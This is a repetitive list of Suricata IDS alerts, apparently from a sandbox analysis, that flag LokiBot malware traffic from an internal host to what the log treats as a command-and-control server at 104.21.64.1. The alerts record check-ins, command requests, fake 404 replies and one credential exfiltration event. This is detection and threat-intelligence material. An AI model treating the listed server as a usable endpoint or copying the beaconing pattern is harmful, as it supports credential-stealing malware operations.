                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49868 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49751
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49757
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49868
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49732 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49908 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49908 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49908 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49908 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49934 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49946 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49946 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49946 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49922 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49922 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49934 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49922 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49934 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49752
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49779
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49761
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49934 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49745
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49763
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49737
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49946 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49908
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49735
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49734
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49829 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49829 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49922 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49854 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49854 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49854 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49854 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49986 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49986 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49986 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49973 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49973 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49973 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49986 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49973 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49793
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49946
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49922
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49755
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49892 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49829 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49892 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49892 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49892 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49854
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49986
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49881 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49881 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49881 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49762
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49829 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49766
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49881 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49806
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49999 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49999 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49999 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49999 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50027 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50027 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50027 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50041 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50041 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50041 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49973
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50027 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50041 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49958 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49958 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49958 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49958 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50057 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50057 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50067 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50058 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50067 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50060 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50060 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50064 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50067 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50056 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50058 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50063 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50058 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50063 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49999
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50064 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50027
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50067 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50056 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50058 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50063 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50056 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50057 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50064 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50053 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50060 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50053 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50063 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50013 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50013 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50053 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50041
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50013 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50064 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50060 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50056 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50013 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50057 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50065 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49958
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50065 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50053 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49840 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50065 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49758
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49840 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49840 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50062 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50062 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50062 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50065 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49840 -> 104.21.64.1:80
